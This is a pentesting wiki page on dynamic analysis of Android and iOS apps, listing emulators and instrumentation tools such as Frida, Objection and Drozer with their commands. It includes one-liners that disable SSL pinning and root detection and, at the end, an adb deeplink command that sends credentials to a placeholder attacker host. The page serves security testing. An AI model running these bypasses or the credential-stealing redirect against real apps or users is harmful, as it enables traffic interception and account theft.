Dynamic Analysis

From pentestwiki.org

Android emulators

Genymotion

  • Genymotion Cloud: Cloud-based Android emulators running on SaaS or as virtual images on AWS, GCP or Alibaba Cloud (PaaS)
  • Genymotion Desktop: Desktop Android emulator

Android Studio

Frameworks

Frida

Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.

Prerequisites:

  • Python 3
$sudo pip install frida-tools


Commands:

$frida-ps
$frida-ls-devices


Launch SnapChat on your iPhone and trace crypto API calls

$frida-trace -U -f com.toyopagroup.picaboo -I "libcommonCrypto*"


Review:

https://grepharder.github.io/blog/0x03_learning_about_universal_links_and_fuzzing_url_schemes_on_ios_with_frida.html


References:

Objection (frida)

Objection is a runtime mobile exploration toolkit, powered by Frida. It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device.

root #cd objection
root #pip3 install objection


SSL pining bypass for iOS:

$objection -N explore -q
\# ios sslpinning disable


SSL pining bypass for Android:

$objection -N explore -q
\# android sslpinning disable


References:

Fridump (frida)

References:

iOS

Needle is an open source modular framework which aims to streamline the entire process of conducting security assessments of iOS applications, and acts as a central point from which to do so. Needle is intended to be useful not only for security professionals, but also for developers looking to secure their code. A few examples of testing areas covered by Needle include: data storage, inter-process communication, network communications, static code analysis, hooking and binary protections.

Prerequisites:

  • Jailbroken device
  • Cydia
  • Apt 0.7 Strict


References:

Android

Xposed

Framework that can change the behaviour of the system and apps without touching any APKs


References:

Drozer

root #drozer console connect


References:

Cydia

Cydia Substrate - Cydia Substrate for Android enables developers to make changes to existing software with Substrate extensions that are injected in to the target process's memory.

References:

Techniques

root #adb install ./JustTrustMe.apk


root #adb install mobi.acpm.sslunpinning_latest.apk


root #adb install Android-SSL-TrustKiller.apk


  • Frida CodeShare The Frida CodeShare project is comprised of developers from around the world working together with one goal - push Frida to its limits in new and innovative ways.
  • Bypassing Root Detection
root #frida --codeshare dzonerzy/fridantiroot -f YOUR_BINARY
  • Bypassing SSL Pinning
root #frida --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida -f YOUR_BINARY
  • Just Trust Me

https://github.com/Fuzion24/JustTrustMe/blob/master/app/src/main/java/just/trust/me/Main.java

  • Root Detection:

https://github.com/dpnishant/appmon/blob/master/intruder/scripts/Android/RootDetection.js

  • Pinning

https://github.com/sensepost/objection/blob/master/objection/hooks/android/pinning/disable.js

Invoke deeplinks manually

Howto use open redirect to steal credentials:

$adb shell am start -a android.intent.action.VIEW $INTENT://$DEEPLINK?$PARAM=https://$ATTACKER --ez authentication_header true



References: